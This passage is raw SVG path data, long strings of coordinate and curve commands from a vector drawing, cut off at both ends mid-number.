,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1